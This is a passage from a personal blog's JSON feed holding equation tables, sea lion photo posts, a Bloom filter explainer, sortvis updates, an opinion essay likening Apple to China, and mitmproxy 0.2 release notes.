<th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"74.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Heat_equation\">Heat equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"75.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"76.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"77.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"78.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"79.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"80.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"81.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"82.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"83.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"84.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"85.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"86.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"87.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"88.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"89.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"90.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"91.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Wave_equation\">Wave equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"92.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"93.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"94.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"95.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Primitive_equations\">Primitive equations<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"96.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"97.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Quintic_equation\">Quintic equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"98.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"99.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"100.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"101.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"102.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Black%E2%80%93Scholes_equation\">Black\u2013Scholes equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"103.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"104.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"105.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Fredholm_integral_equation\">Fredholm integral equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"106.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Poisson%27s_equation\">Poisson&#39;s equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"107.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"108.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"109.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Helmholtz_Equation\">Helmholtz Equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"110.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Van_der_Waals_equation\">Van der Waals equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"111.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"112.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"113.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"114.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"115.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Lorentz_equation\">Lorentz equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"116.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"117.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"118.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Maxwell%27s_equations\">Maxwell&#39;s equations<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"119.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"120.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"121.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"122.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"123.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"124.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"125.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"126.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"127.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"128.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"129.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"130.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"131.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"132.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"133.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n"},{"title":"Sea lions and lifestyle change","published":"2010-09-02T00:00:00+00:00","updated":"2010-09-02T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/photos\/sealions-and-lifestyle\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/photos\/sealions-and-lifestyle\/","content":"<p>About a year and a half ago, after dinner at a favourite local restaurant, and\nhaving entered into that zone of philosophical clarity that sets in around the\ndessert wine, my wife and I had the sudden simultaneous realisation that it was\ntime for a change. For most of our adult lives, we had lived in the suburb of\nNewtown in Sydney - a hyper-urban jungle densely packed with coffee shops and\ntheatres, inhabited by a thronging mixture of students and bohemians with\ncounterculturally-correct hairdos. It was all beginning to seem a bit tired and\nsame-ish. We needed more time and more space. We needed to get back to the\nessentials of life.<\/p>\n<p>Four weeks later our furniture was in a shipping container en-route to Dunedin,\na small university town near the southern tip of New Zealand. We decided to\nwork together from home, keeping our schedules flexible to make time for walks,\nreading, cooking, and (more recently) spending time with our son. It was a huge\nrisk - it was quite possible that the isolation would impose a punishing work\ntravel regime on me, or put a crimp in my wife's very specialised career in\nlinguistics.  It took enterprise, determination and a no small amount of\npossibly-foolish optimism, but it's all worked out. Our leap of faith has\nturned out to be one of the best decisions we've ever made. Dunedin is a\nbreathtakingly beautiful place to live - I still can't quite believe that I can\nget up from my desk, and within 20 minutes be on a deserted beach littered with\nlazy sea lions basking in the winter sun.<\/p>\n<p>My advice to you is this: when your life begins to seem a bit stuffy and\nconstricted, when you begin to feel you've lost sight of something more\nfundamental and get the urge to refactor - <em>just do it<\/em>. There has never been a\nbetter time in history for people who choose to march to a different drum.<\/p>\n<p>To prove what a lucky fellow I am, here are two photos from my walk yesterday\nmorning - click to view in a lightbox.<\/p>\n<div class=\"media\">\n    <a href=\"male-full.jpg\">\n        <img src=\"male.jpg\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>It's not clear from the picture, but this is a massive New Zealand Sea Lion\nbull - about 400 kilograms of apparently boneless muscle and blubber.<\/p>\n<div class=\"media\">\n    <a href=\"female-full.jpg\">\n        <img src=\"female.jpg\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>It's hard to believe that this sleek female is the same species as the dumpy,\nsnub-nosed chap above. New Zealand Sea Lions are the rarest species of sea lion\nin the world - it's an immense privilege to be able to share a beach with them.<\/p>\n"},{"title":"3 Rules of thumb for Bloom Filters","published":"2010-08-25T00:00:00+00:00","updated":"2010-08-25T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/bloom-filter-rules-of-thumb\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/bloom-filter-rules-of-thumb\/","content":"<p>I've spent a few days this week working on a side-project that relies heavily on\nBloom Filters (look for a post on the result of my labours in the next week or\nso). If you don't know what a Bloom filter is, <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Bloom_filter\">you should probably find\nout<\/a> - they're very neat and have a\n<a rel=\"external\" href=\"http:\/\/citeseerx.ist.psu.edu\/viewdoc\/download?doi=10.1.1.127.9672&amp;rep=rep1&amp;type=pdf\">huge<\/a>\n<a rel=\"external\" href=\"http:\/\/citeseerx.ist.psu.edu\/viewdoc\/download?doi=10.1.1.4.3831&amp;rep=rep1&amp;type=pdf\">range<\/a>\nof\n<a rel=\"external\" href=\"http:\/\/citeseerx.ist.psu.edu\/viewdoc\/download?doi=10.1.1.126.2458&amp;rep=rep1&amp;type=pdf\">fascinating<\/a>\n<a rel=\"external\" href=\"http:\/\/www.cs.cmu.edu\/~dga\/papers\/fastcache-tr.pdf\">applications<\/a>.<\/p>\n<p>I often need to do rough back-of-the-envelope reasoning about things, and I find\nthat doing a bit of work to develop an intuition for how a new technique\nperforms is usually worthwhile. So, here are three broad rules of thumb to\nremember when discussing Bloom filters down the pub:<\/p>\n<h3 id=\"1-one-byte-per-item-in-the-input-set-gives-about-a-2-false-positive-rate\">1 - One byte per item in the input set gives about a 2% false positive rate.<\/h3>\n<p>In other words, we can add 1024 elements to a 1KB Bloom Filter, and check for\nset membership with about a 2% false positive rate. Nifty. Here are some common\nfalse positive rates and the approximate required bits per element, assuming an\noptimal choice of the number of hashes:<\/p>\n<table>\n    <tr>\n        <th>fp rate<\/th> <th>bits<\/th>\n    <\/tr>\n    <tr>\n        <td>50%<\/td> <td>1.44<\/td>\n    <\/tr>\n    <tr>\n        <td>10%<\/td> <td>4.79<\/td>\n    <\/tr>\n    <tr>\n        <td>2%<\/td> <td>8.14<\/td>\n    <\/tr>\n    <tr>\n        <td>1%<\/td> <td>9.58<\/td>\n    <\/tr>\n    <tr>\n        <td>0.1%<\/td> <td>14.38<\/td>\n    <\/tr>\n    <tr>\n        <td>0.01%<\/td> <td>19.17<\/td>\n    <\/tr>\n<\/table>\n<p>Graphically, the relation between bits per element and the false positive rate\nwhen using an optimal number of hashes looks like this:<\/p>\n<div class=\"media\">\n    <a href=\"graph.png\">\n        <img src=\"graph.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Bits per element vs. false positive probability\n    <\/div>\n    \n<\/div><h3 id=\"2-the-optimal-number-of-hash-functions-is-about-0-7-times-the-number-of-bits-per-item\">2 - The optimal number of hash functions is about 0.7 times the number of bits per item.<\/h3>\n<p>This means that the number of hashes is \"small\", varying from about 3 at a 10%\nfalse positive rate, to about 13 at a 0.01% false positive rate.<\/p>\n<h3 id=\"3-the-number-of-hashes-dominates-performance\">3 - The number of hashes dominates performance.<\/h3>\n<p>The number of hashes determines the number of bits that need to be read to test\nfor membership, the number of bits that need to be written to add an element,\nand the amount of computation needed to calculate hashes themselves. We may\nsometimes choose to use a less than optimal number of hashes for performance\nreasons (especially when we choose to round down when the calculated optimal\nnumber of hashes is fractional).<\/p>\n<h2 id=\"the-maths\">The maths<\/h2>\n<p>Let's do some maths to justify the above, starting with two well-known results\nabout Bloom filters that can be found in every description of the data\nstructure. First, by a combinatoric argument we can show that the probability\n<strong>p<\/strong> of a false positive is approximated by the following formula, where <strong>k<\/strong>\nis the number of hash functions, <strong>n<\/strong> is the size of the input set and <strong>m<\/strong>\nis the size of the Bloom filter in bits:<\/p>\n<div class=\"media\">\n    <a href=\"formula-1.png\">\n        <img src=\"formula-1.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Second, we know that <strong>k<\/strong> is optimal when:<\/p>\n<div class=\"media\">\n    <a href=\"formula-2.png\">\n        <img src=\"formula-2.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Notice that in this formula, <strong>m\/n<\/strong> is the number of bits per element in the\nBloom filter. So, the optimal number of hashes grows linearly with the number\nof bits per element (<strong>b<\/strong>):<\/p>\n<div class=\"media\">\n    <a href=\"formula-6.png\">\n        <img src=\"formula-6.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Assuming an optimal choice for <strong>k<\/strong> in the first formula, we get :<\/p>\n<div class=\"media\">\n    <a href=\"formula-3.png\">\n        <img src=\"formula-3.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Solving for <strong>m<\/strong>:<\/p>\n<div class=\"media\">\n    <a href=\"formula-4.png\">\n        <img src=\"formula-4.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>It's clear from the above that for a given false-positive rate, the number of\nbits in a Bloom filter grows linearly with <strong>n<\/strong>. If we set <strong>n = 1<\/strong>, we get\nthe following expression for the approximate number of bits needed per set\nelement:<\/p>\n<div class=\"media\">\n    <a href=\"formula-5.png\">\n        <img src=\"formula-5.png\"  \/>\n    <\/a>\n\n    \n<\/div>"},{"title":"Love and war on Sandfly Beach","published":"2010-08-16T00:00:00+00:00","updated":"2010-08-16T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/photos\/sandflysealions\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/photos\/sandflysealions\/","content":"<p>Hiked to the end of <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Sandfly_Bay\">Sandfly Bay<\/a>\ntoday. A strong North-Easter drove streams of fine beach-sand across the dunes,\nmaking it feel like we were wading knee-deep in a swift river of sand. Surreal\nand beautiful, but I was too afraid of getting grit into my camera to\nphotograph the scene.<\/p>\n<p>At the end of the beach, we found two groups of <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/New_Zealand_Sea_Lion\">New Zealand Sea\nLions<\/a>. A female basking\nwith two large cubs, and two young males sparring while a massive mature bull\nlooked on.<\/p>\n<p>Click to view in full size.<\/p>\n<div class=\"media\">\n    <a href=\"sealion_with_cubs_full.jpg\">\n        <img src=\"sealion_with_cubs.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Sea lion with cubs\n    <\/div>\n    \n<\/div><div class=\"media\">\n    <a href=\"sparring_sealions_full.jpg\">\n        <img src=\"sparring_sealions.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Sparring sea lions\n    <\/div>\n    \n<\/div>"},{"title":"sortvis.org","published":"2010-07-14T00:00:00+00:00","updated":"2010-07-14T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/visualisation\/sortvisdotorg\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/visualisation\/sortvisdotorg\/","content":"<p>I've just put up <a rel=\"external\" href=\"http:\/\/sortvis.org\">sortvis.org<\/a>, the new official home of the\n<a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/sortvis\">sortvis<\/a> sorting algorithm visualisation\nproject. The site has a complete set of up-to-date images, explanations of the\nvisualisation techniques, code snippets, and a rather snazzy Javascript image\nviewer to let you pan and zoom through the huge images produced by the sortvis\n<a rel=\"external\" href=\"http:\/\/sortvis.org\/visualisations.html\">dense<\/a> visualisation. Take a look, and\nlet me know what you think!<\/p>\n"},{"title":"Taiaroa Head","published":"2010-05-18T00:00:00+00:00","updated":"2010-05-18T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/photos\/taiaroa\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/photos\/taiaroa\/","content":"<div class=\"media\">\n    <a href=\"taiaroa-full.jpg\">\n        <img src=\"taiaroa.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Taiaroa head\n    <\/div>\n    \n<\/div>\n<p>Taken on a stormy day from Aramoana Mole.<\/p>\n"},{"title":"Apple, China and the war of ideas","published":"2010-05-07T00:00:00+00:00","updated":"2010-05-07T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/politics\/apple-is-china\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/politics\/apple-is-china\/","content":"<p>There was a minor flap recently when <a rel=\"external\" href=\"http:\/\/www.androidguys.com\/2010\/04\/27\/andy-rubin-reacts-steve-jobs-likens-apple-north-korea\/\">Andy Rubin compared Apple to North\nKorea<\/a>.\nMany <a rel=\"external\" href=\"http:\/\/www.youtube.com\/watch?v=lQKdEdzHnfU\">turtle-necked Apple hipsters<\/a>\nhad their feathers mildly ruffled, and bloggers gleefully reaped a tiny flurry\nof page impressions. Quite right too, because Rubin was clearly wrong. Apple is\nnothing like North Korea, because <strong>Apple is the China of the tech world<\/strong>. Lend\nme your ears for a minute, while I make a broad-strokes argument for this\nstatement.<\/p>\n<div class=\"media\">\n    <a href=\"mao.jpg\">\n        <img src=\"mao.jpg\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Not so long ago, the consensus in the West was that political liberty and\ncapitalism went hand-in-hand. Wherever one arose, the other would inevitably\nfollow, and in their wake would come prosperity. When China started liberalising\nits markets, it seemed self-evident that the rise of capitalism in China would\nbring democracy in its wake. The Tiananmen Square protests in 1989 were supposed\nto be a sign of things to come, a precursor to wider revolution. The West's\nargument was persuasive - it was borne out by a century during which the world\nwas a roiling cauldron of political and economic experimentation, and nearly\nevery command economy had failed. Today, the international landscape has changed\nentirely. The West has had a catastrophic financial meltdown, and things are\nonly getting worse. There is a sense that the US-led Western order is in\ndecline, and the Chinese-led east is rising.  China has been the fastest growing\nmajor economy in the world for a decade, and the Communist Party is more firmly\nin control than ever. Today, there's no apparent prospect of political reform.\nChinese intellectuals and diplomats are beginning to mount an increasingly\nassertive and persuasive argument for a system of government that brings\nprosperity without liberty, and dictatorships the world over are listening very,\nvery carefully.<\/p>\n<p>In the software world, we've also spent decades arguing that freedom and\nprosperity go hand in hand. This is the <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Open_source_software#Open_source_software_vs._free_software\">\"Open\nSource\"<\/a>\njustification for free software: a pragmatic position that we should have\nliberty not for its own sake, but because it produces better outcomes. This is\nalso the argument behind open hardware platforms, behind open Internet\nstandards, behind interoperability. Some bloody battles had to be fought with\nmonopolists, but in the main the last 20 years have been a stunning success for\nopenness. There has always been a\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Richard_Stallman\">minority<\/a> who have made a more\nfundamental case for liberty, but it's important to recognize that they have\nlost the debate. The engine that drives the most important Open Source projects\nis entirely based on a superficial utilitarianism - the Googles and IBMs of the\nworld don't contribute to Open Source because they love liberty, but because the\nfinancial return they get from doing so is greater than their investment. The\nfundamental distinction between openness and free-ness hasn't been important so\nfar, though, because ideology and utilitarian arguments were aligned. Now,\nthings are changing.  No-one can deny that Apple's mobile device strategy has\nbeen a complete slam-dunk. The iPhone is the <a rel=\"external\" href=\"http:\/\/tech.fortune.cnn.com\/2010\/03\/02\/what-doth-it-profit-an-iphone\/\">most profitable handset out\nthere<\/a> by\nfar, and the iPad is shaping up to be huge. Apple's long-term plan is\nbreathtakingly ambitious - it's making a play for complete dominance in the\nmobile market, with an integrated offering that controls everything from content\nto applications to the devices themselves. It's therefore making a play for\ntotal control of the way most people will experience computation in the near\nfuture. Not even the most die-hard free-software hippie can deny that Apple's\nsuccess has been won on merit - their devices are simply, unmistakably better\nthan the competition.  Open platforms have been out-classed in almost every\nmeasurable dimension. So, we may be entering the next stage of the computer\nrevolution with devices where every native application has to be approved by a\nsingle authority, where even programming languages and development tools are\ncentrally controlled. Apple's competitors and imitators are watching and taking\nnotes, because far from being punished by the market for this, they have\nprofited beyond the wildest dreams of avarice.<\/p>\n<p>Apple and China have put pragmatists who also value freedom in a quandary. In\nthe past, practice and ideology aligned neatly: political liberty and economic\nprogress went hand in hand, and so did open platforms and commercial success.\nThere are now powerful counter-examples to this line of thinking, and it seems\nclear that making a pragmatic argument for liberty has been a strategic\nmis-step both in politics and in technology. Advocates of freedom will have to\nturn back to more fundamental arguments: human rights, ethics and morality.  We\nshould recognize that at this point in time, we're losing the war of ideas. I\nmust admit, in my darker moments I'm pessimistic about our ability to make the\ncase persuasively to a disengaged public.<\/p>\n<p><strong>PS<\/strong><\/p>\n<p>To keep this post manageable, I've not talked about factors that muddy the\nwaters for the technical side of the argument. For instance, I don't think\nMicrosoft is a counter-example, and neither is Apple's support for open web\nstandards. I'll save those for a future post. I'd also like to point out that\nI'm absolutely not anti-Apple - I own a lot of Apple gear that I use every day.\nMy position regarding China's place in the world is a caricature of <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Stefan_Halper\">Stefan\nHalper<\/a>'s superb book <a rel=\"external\" href=\"http:\/\/www.amazon.com\/Beijing-Consensus-Authoritarian-Dominate-Twenty-First\/dp\/0465013619\/\">\"The Beijing\nConsensus: How China's authoritarian model will dominate the twenty-first\ncentury\"<\/a>.\nYou can listen to him speaking about this book at the Cato Institute <a rel=\"external\" href=\"http:\/\/www.cato.org\/event.php?eventid=6990\">over\nhere<\/a>.<\/p>\n"},{"title":"Sortvis updates","published":"2010-04-01T00:00:00+00:00","updated":"2010-04-01T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/visualisation\/sortvis-update\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/visualisation\/sortvis-update\/","content":"<div class=\"media\">\n    <a href=\"oddevensort.png\">\n        <img src=\"oddevensort.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>There have been some improvements to <a rel=\"external\" href=\"http:\/\/sortvis.org\">sortvis<\/a>!@) - my\nsorting algorithm visualisation project - in the last few months. Graphs are now\nmore balanced, with an equal lead-in and lead-off at the edges. There have also\nbeen a swathe of algorithm contributions - thanks to Aaron Gallagher and Chris\nWong (the image above is of <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Odd-even_sort\">Odd-even\nSort<\/a>, contributed by Aaron). As\nusual, you can find the code for all of this on\n<a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/sortvis\">github<\/a>. I've updated the visualisation page\non my blog with new graphs for all algorithms - go take a look\n<a rel=\"external\" href=\"http:\/\/sortvis.org\">here<\/a>.<\/p>\n<p>I plan to move sortvis and the collection of visualisations onto their own\ndomain soon. I'm also thinking about making large wall-posters of the\nvisualisations available. I plan to make some prints for myself, and I'm\nassuming that I'm not the only one geeky enough to want a sorting algorithm on\nmy wall. Would anyone be interested?<\/p>\n"},{"title":"mitmproxy 0.2","published":"2010-03-01T00:00:00+00:00","updated":"2010-03-01T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/software\/mitmproxy0_2\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/software\/mitmproxy0_2\/","content":"<p>Just released <a rel=\"external\" href=\"http:\/\/mitmrpoxy.org\">mitmproxy 0.2<\/a>. Changes include:<\/p>\n<ul>\n<li>Big speed and responsiveness improvements, thanks to Thomas Roth<\/li>\n<li>Support urwid 0.9.9<\/li>\n<li>Terminal beeping based on filter expressions<\/li>\n<li>Filter expressions for terminal beeps, limits, interceptions and sticky\ncookies can now be passed on the command line.<\/li>\n<li>Save requests and responses to file<\/li>\n<li>Split off non-interactive dump functionality into a new tool called\nmitmdump<\/li>\n<li>\"A\" will now accept all intercepted connections<\/li>\n<li>Lots of bugfixes<\/li>\n<\/ul>\n"},{"title":"How to stop a story from appearing on 